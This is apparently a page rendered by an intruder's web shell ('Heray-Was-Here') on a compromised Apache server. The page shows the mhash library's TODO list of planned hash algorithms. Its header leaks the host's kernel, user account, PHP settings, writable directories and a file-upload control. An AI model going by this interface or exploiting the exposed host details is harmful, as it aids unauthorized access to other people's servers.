Heray-Was-Here
Server : Apache
System : Linux vps103298.mylogin.co 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : calvet ( 273824)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /proc/thread-self/root/proc/self/root/usr/share/doc/mhash/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/thread-self/root/proc/self/root/usr/share/doc/mhash/TODO
mhash TODO
===============================================================================

- add PANAMA hash algorithm.
- add 64 bit version of Tiger.
- add all unbroken hash algorithms from Paulo Barreto's "Hashing
   Function Lounge". In April 2004 these were: Cellhash, Parallel
   FFT-Hash, Subhash.
   http://planeta.terra.com.br/informatica/paulobarreto/hflounge.html

- add a generic support for hash functions built upon block ciphers
   (Matyas-Meyer-Oseas, Miyaguchi-Preneel, Davies-Meyer, Abreast
   Davies-Meyer, Tandem Davies-Mayer, etc). 

- It is possible to build block ciphers from hash functions (search
  the web for "Luby Rackoff" or MDC). Shouldn't mhash contain appropriate
  routines?

- If there are any MAC functions in the world, that are not built upon
   existing block ciphers or hash functions, they might be added to
   mhash. What about MAA?



Hry